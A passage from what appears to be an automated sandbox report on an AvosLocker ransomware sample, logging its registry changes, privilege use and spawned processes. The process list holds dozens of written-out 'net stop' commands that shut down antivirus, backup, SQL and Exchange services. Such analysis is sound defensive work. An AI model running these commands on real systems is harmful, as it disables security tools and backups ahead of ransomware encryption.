N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-945322488-2060912225-3527527000-1000\{252E183E-B5F3-48C5-9D04-333C2BA77F7C} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3264 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4104 wrote to memory of 948 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4104 wrote to memory of 948 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4104 wrote to memory of 948 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3832 wrote to memory of 4620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3832 wrote to memory of 4620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3832 wrote to memory of 4620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 620 wrote to memory of 1204 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1204 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1204 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4996 wrote to memory of 1876 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4996 wrote to memory of 1876 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4996 wrote to memory of 1876 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4368 wrote to memory of 64 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4368 wrote to memory of 64 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4368 wrote to memory of 64 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2132 wrote to memory of 3852 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2132 wrote to memory of 3852 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2132 wrote to memory of 3852 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2912 wrote to memory of 5076 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 5076 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 5076 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2396 wrote to memory of 1952 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2396 wrote to memory of 1952 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2396 wrote to memory of 1952 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3056 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3056 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3056 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4512 wrote to memory of 4024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 4024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 4024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2436 wrote to memory of 2160 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

